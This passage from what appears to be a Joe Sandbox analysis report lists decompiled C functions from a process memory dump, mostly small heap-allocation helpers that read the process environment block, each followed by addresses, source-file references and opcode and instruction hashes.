                                          • Instruction Fuzzy Hash: 3DD0C939352A80CFD61BCB0CC994B0537A4FB04B40FC504D0E500CB762E72CD944CA00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010D35A1 Relevance: .0, Instructions: 12COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E010D35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E010BEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                          0x010d35a1
                                          0x010d35a1
                                          0x010d35a5
                                          0x010d35ab
                                          0x010d35ab
                                          0x010d35b5
                                          0x00000000
                                          0x010d35c1
                                          0x010d35b7

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                          • Instruction ID: 2d0aa3dfb4041de321d51f2216bf0701d6472903e8a1e2b30754e7f95e5b1a07
                                          • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                          • Instruction Fuzzy Hash: DDD0A77140138199DB41AF14C1147ECB7B1BB00204FD8109580C60D45AC3354909C602
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010ADB40 Relevance: .0, Instructions: 11COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E010ADB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L010C4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                          0x010adb4d
                                          0x010adb54
                                          0x010adb5f
                                          0x010adb56
                                          0x010adb56
                                          0x010adb5c
                                          0x010adb5c

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                          • Instruction ID: 066cac220a2c1decdbc1698c65b41d798a85770522a6635408d0faccaaf8a0e6
                                          • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                          • Instruction Fuzzy Hash: 98C08C30290A01EAEB321F60CD01B403AA0BB10F01F8400A06381DA4F0DBB8D801EA00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0112A537 Relevance: .0, Instructions: 11COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0112A537(intOrPtr _a4, intOrPtr _a8) {

				return L010C8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                          0x0112a553

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                          • Instruction ID: 21bc34daf305f0bfacf22cd49bbb3c1806345f34fcfd723b063bc1b0cffe3046
                                          • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                          • Instruction Fuzzy Hash: FDC08C33080248BBCB126F81CC00F4A7F2AFBA4B60F008015FA480B571C632E970EF88
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010C3A1C Relevance: .0, Instructions: 10COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E010C3A1C(intOrPtr _a4) {
				void* _t5;

				return L010C4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                          0x010c3a35

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                          • Instruction ID: df387910a98b819e27ad89bb2777237fb2fb32b94b98979d6d08046e8e76a5b8
                                          • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                          • Instruction Fuzzy Hash: 46C08C32080248BBC7226F41DC00F057B29E7A4B60F000020B6440A5608572EC60D988
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010AAD30 Relevance: .0, Instructions: 10COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E010AAD30(intOrPtr _a4) {

				return L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                          0x010aad49

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                          • Instruction ID: 1b759311332e096fa1c964f6771865707d328e41ef1af1f8eaee5625ed824b23
                                          • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                          • Instruction Fuzzy Hash: EAC08C32080248BBC7126B85CD00F057B29E7A0B60F000020F6040A6618932E860D988
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010D36CC Relevance: .0, Instructions: 10COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E010D36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L010C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                          0x010d36d2
                                          0x010d36e8
                                          0x010d36d4
                                          0x010d36e5
                                          0x010d36e5

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                          • Instruction ID: ddf581e66096910495e3348555d8eb633a403ccd31a1c9ad013a5f4b2cafa3c4
                                          • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                          • Instruction Fuzzy Hash: CBC02BB4150440FBD7251F30CD10F1872A4F704E21F6403987360894F0D5689C00D501
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010B76E2 Relevance: .0, Instructions: 10COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E010B76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                          0x010b76e4
                                          0x00000000
                                          0x010b76f8
                                          0x010b76fd

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                          • Instruction ID: 8e499bb38cd05c247c788750aa16facde8b276391f253e1a9e9aef2fff7c55ec
                                          • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                          • Instruction Fuzzy Hash: 3BC08C701411C45AEB2A570CCE64B643A90BB4CA08F4802DCEA810D4E2C368AC02DA08
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010C7D50 Relevance: .0, Instructions: 7COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E010C7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                          0x010c7d56
                                          0x010c7d5b
                                          0x010c7d60
                                          0x010c7d5d
                                          0x010c7d5d
                                          0x010c7d5d

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                          • Instruction ID: 6185d07edfb6cb30cb6abaff70cc07323139bcfb7ae2ade6ce6c94e1417fedbe
                                          • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                          • Instruction Fuzzy Hash: 75B092353019418FCE96EF18C080B1933F8BB44A40F8400D4E400CBA21D229E8008D00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010D2ACB Relevance: .0, Instructions: 5COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E010D2ACB() {
				void* _t5;

				return E010BEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                          0x010d2adc

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                          • Instruction ID: fbc8c6c9696520a2dc8aeea1936b52b5804831c142c416eaab26309cb229a978
                                          • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                          • Instruction Fuzzy Hash: 9CB01232C10441CFCF02EF40C650FDA7331FB40750F054490900227930C228AC01CB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E9950 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5b4e9bd631130e39b35c80447050443637423feb8fda563be52ab071c0748837
                                          • Instruction ID: 7fd4b5f7551f62ce0aca67c6df6eb043e4f45baafb4bd290dfde68346251fa3a
                                          • Opcode Fuzzy Hash: 5b4e9bd631130e39b35c80447050443637423feb8fda563be52ab071c0748837
                                          • Instruction Fuzzy Hash: E99002A120140903D140659988057070105A7D0342F52C015A3454595ECA698C5172B5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E99D0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 403cd99eb56d85fe7a04eb9c20d5edbb3eab7fe5dd4721c0ff8e0c54d1a074b1
                                          • Instruction ID: ee469d93bf1c151504d59076a18ee8302fe4e548ba5791d0042d5834a2d03585
                                          • Opcode Fuzzy Hash: 403cd99eb56d85fe7a04eb9c20d5edbb3eab7fe5dd4721c0ff8e0c54d1a074b1
                                          • Instruction Fuzzy Hash: 589002A121100542D104619984057060145A7E1241F52C016A3544594CC5698C6172A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E9820 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 71aa18a52d9cf014304767b5856095aabdc8da6f241499adad0c07b5b93ba118
                                          • Instruction ID: 1a7f0b1c013e2f3bdc41493ce7b405f880d2ccaec1177fc392c5ca81e27c2484
                                          • Opcode Fuzzy Hash: 71aa18a52d9cf014304767b5856095aabdc8da6f241499adad0c07b5b93ba118
                                          • Instruction Fuzzy Hash: 2990027124100902D141719984057060109B7D0281F92C016A1814594EC6958A56BBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010EB040 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a6fd6ef2aa3f7b5b3783548bb903bc8ecf04ea6513814344e7ac5cf782aab666
                                          • Instruction ID: 00d211200f2e900435c5fc1acf0ea486f54e8b0c4cd82a83dadcf37707534318
                                          • Opcode Fuzzy Hash: a6fd6ef2aa3f7b5b3783548bb903bc8ecf04ea6513814344e7ac5cf782aab666
                                          • Instruction Fuzzy Hash: C29002A1601145434540B19988055065115B7E1341392C125A18445A0CC6A88855B3E5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E98A0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e3f1a4cf4b28349a2a3869ce9b75b336c74fc8a45d0b33e60f3e05767fcae3fd
                                          • Instruction ID: 4430fefe24b3b1f89df36f08f6926979567cb918fb9e7e5baa5fb91a2fe9ca5f
                                          • Opcode Fuzzy Hash: e3f1a4cf4b28349a2a3869ce9b75b336c74fc8a45d0b33e60f3e05767fcae3fd
                                          • Instruction Fuzzy Hash: 0D90026130100902D102619984157060109E7D1385F92C016E2814595DC6658953B2B2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E9B00 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 47945e30a175ccd8176516cbd12c615798fafeb9cbba029adfa255a98a08e2cc
                                          • Instruction ID: 091871aa89965484ebe5e33c0559ccb42dd3d24e2f258bb87556cefaa11214d7
                                          • Opcode Fuzzy Hash: 47945e30a175ccd8176516cbd12c615798fafeb9cbba029adfa255a98a08e2cc
                                          • Instruction Fuzzy Hash: 5190026124100D02D1407199C4157070106E7D0641F52C015A1414594DC656896577F1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010EA3B0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9a409db48e49aa3dd614690a14819f0a0ffb1d192119964b24647ea654c63f7d
                                          • Instruction ID: 4fe98a8bb8df7c49e5b34955b7c1309b862348cac16811058487284226491440
                                          • Opcode Fuzzy Hash: 9a409db48e49aa3dd614690a14819f0a0ffb1d192119964b24647ea654c63f7d
                                          • Instruction Fuzzy Hash: 0D90027120144502D1407199C44570B5105B7E0341F52C415E1815594CC6558856B3A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E9A10 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b577b6fb549b55a3147863484acc7dbb883e416c5734ed44c9c8d54f14504bc1
                                          • Instruction ID: 0e803e749487f9c3b1ac7a628776cf750c017d43586750616e737c96d4b4d18b
                                          • Opcode Fuzzy Hash: b577b6fb549b55a3147863484acc7dbb883e416c5734ed44c9c8d54f14504bc1
                                          • Instruction Fuzzy Hash: 9090027120140902D100619988097470105A7D0342F52C015A6554595EC6A5C89176B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E9A80 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d6d6dbc99669e0966f1728620f7cb0808bf59dd943058fc1c413acbcf9bd20e6
                                          • Instruction ID: 51dc996a437c12501c691cb67b638a390177e419b9dbc9baae0befbb1e7f41b1
                                          • Opcode Fuzzy Hash: d6d6dbc99669e0966f1728620f7cb0808bf59dd943058fc1c413acbcf9bd20e6
                                          • Instruction Fuzzy Hash: A990026120144942D14062998805B0F4205A7E1242F92C01DA5546594CC955885577A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E9520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d69fda09d965fcbba221694bab45074eef6e48f46ae2ebee3d5e997cbb9b3bd0
                                          • Instruction ID: ace80cc78a14f91f0e43a717f7658dbcd7b5a6d2d8bf979b392da8b342a7e82d
                                          • Opcode Fuzzy Hash: d69fda09d965fcbba221694bab45074eef6e48f46ae2ebee3d5e997cbb9b3bd0
                                          • Instruction Fuzzy Hash: A09002E1201145924500A299C405B0A4605A7E0241B52C01AE24445A0CC5658851B2B5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010EAD30 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fb08f8031fdaec06a803aae062d0e33a73869d0224b69cbec39ebfca71e9c5f2
                                          • Instruction ID: 1bb5109fb0238fcd5016d780313281ba25e326f1b8a274eeb10cd206c55ce937
                                          • Opcode Fuzzy Hash: fb08f8031fdaec06a803aae062d0e33a73869d0224b69cbec39ebfca71e9c5f2
                                          • Instruction Fuzzy Hash: C9900271A05005129140719988157464106B7E0781B56C015A1904594CC9948A5573E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E9560 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3a488c02ea80746c4d3bd79aee951339fa9d66cb286c3c1fc56478ee8471c2e5
                                          • Instruction ID: d25e56dfd47397c43ec8d2c0740713f930d8be3ce13c5c169488226fc7444005
                                          • Opcode Fuzzy Hash: 3a488c02ea80746c4d3bd79aee951339fa9d66cb286c3c1fc56478ee8471c2e5
                                          • Instruction Fuzzy Hash: 63900265221005020145A599460560B0545B7D6391392C019F28065D0CC661886573A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E95F0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d1b2d3c58ed71a15381dad4faf62cfd3b138be1174b4ec3472e5ee9129f24831
                                          • Instruction ID: 3ec002f449e62f49ec5e47bd2b2bd48c930666cf359ff299f2bf95400ec87e7d
                                          • Opcode Fuzzy Hash: d1b2d3c58ed71a15381dad4faf62cfd3b138be1174b4ec3472e5ee9129f24831
                                          • Instruction Fuzzy Hash: 2090027120100D02D104619988057860105A7D0341F52C015A7414695ED6A5889172B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010EA710 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bce15732446768898e2b6387ddde6c822aafeaf03f4db7ca8c06f809133fc1e5
                                          • Instruction ID: dd5863d5ee3c1f87b7660304a636173b586c1ec6564764f9db02e25952c89164
                                          • Opcode Fuzzy Hash: bce15732446768898e2b6387ddde6c822aafeaf03f4db7ca8c06f809133fc1e5
                                          • Instruction Fuzzy Hash: 6C900271301005529500A6D99805B4A4205A7F0341B52D019A5404594CC594886172A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E9730 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 692349964be768f512986bc0a121fd0f2726c97fad5dffc07483cf5ddbc992df
                                          • Instruction ID: e1daaaa6ae34c4ab2e49a72ee5451306dd25d37c83844311ea8b9398603049dc
                                          • Opcode Fuzzy Hash: 692349964be768f512986bc0a121fd0f2726c97fad5dffc07483cf5ddbc992df
                                          • Instruction Fuzzy Hash: A590026160500902D140719994197060115A7D0241F52D015A1414594DC6998A5577E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E9760 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bdd85ba1390e17a36ff7d7cf1b459ab758a3a8c2e7130f458c8e8cbc65920af2
                                          • Instruction ID: 35d8f9c49fcb8d2c4c17cea0f3b68b4eeaad5e7febc8f8e46073a0e7dbc32c77
                                          • Opcode Fuzzy Hash: bdd85ba1390e17a36ff7d7cf1b459ab758a3a8c2e7130f458c8e8cbc65920af2
                                          • Instruction Fuzzy Hash: 5390027120100903D100619995097070105A7D0241F52D415A1814598DD696885172A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E9770 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 29809f11b5fe64b9fda7cef15cbad2478cdfc386bbd697ed67096fdf28a98789
                                          • Instruction ID: cd3c15ab745898d71d8b2ac4a7f08bf66e1fb53220ba3f11144ea9e2c1b22486
                                          • Opcode Fuzzy Hash: 29809f11b5fe64b9fda7cef15cbad2478cdfc386bbd697ed67096fdf28a98789
                                          • Instruction Fuzzy Hash: 9290026120504942D10065999409B060105A7D0245F52D015A24545D5DC6758851B2B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010EA770 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6efa951097d595c369b1e0b69edddeaeea343143da18b621defdb16f34b2c7b4
                                          • Instruction ID: bfb75eb89c7241d822ea86b723cdd841db3b5634206468e23a58ea354a7849d3
                                          • Opcode Fuzzy Hash: 6efa951097d595c369b1e0b69edddeaeea343143da18b621defdb16f34b2c7b4
                                          • Instruction Fuzzy Hash: 5890027520504942D50065999805B870105A7D0345F52D415A18145DCDC6948861B2A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E9610 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5f4e276c46b9e66858750de29ce575ea3af428e6bd6fd9f07c2753844f7266f6
                                          • Instruction ID: e0c81ffae717a68de9079fb9a8ac687fc0424bde2de907ad0326d6d12474f2f8
                                          • Opcode Fuzzy Hash: 5f4e276c46b9e66858750de29ce575ea3af428e6bd6fd9f07c2753844f7266f6
                                          • Instruction Fuzzy Hash: 7890027160500D02D150719984157460105A7D0341F52C015A1414694DC7958A5577E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E9650 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
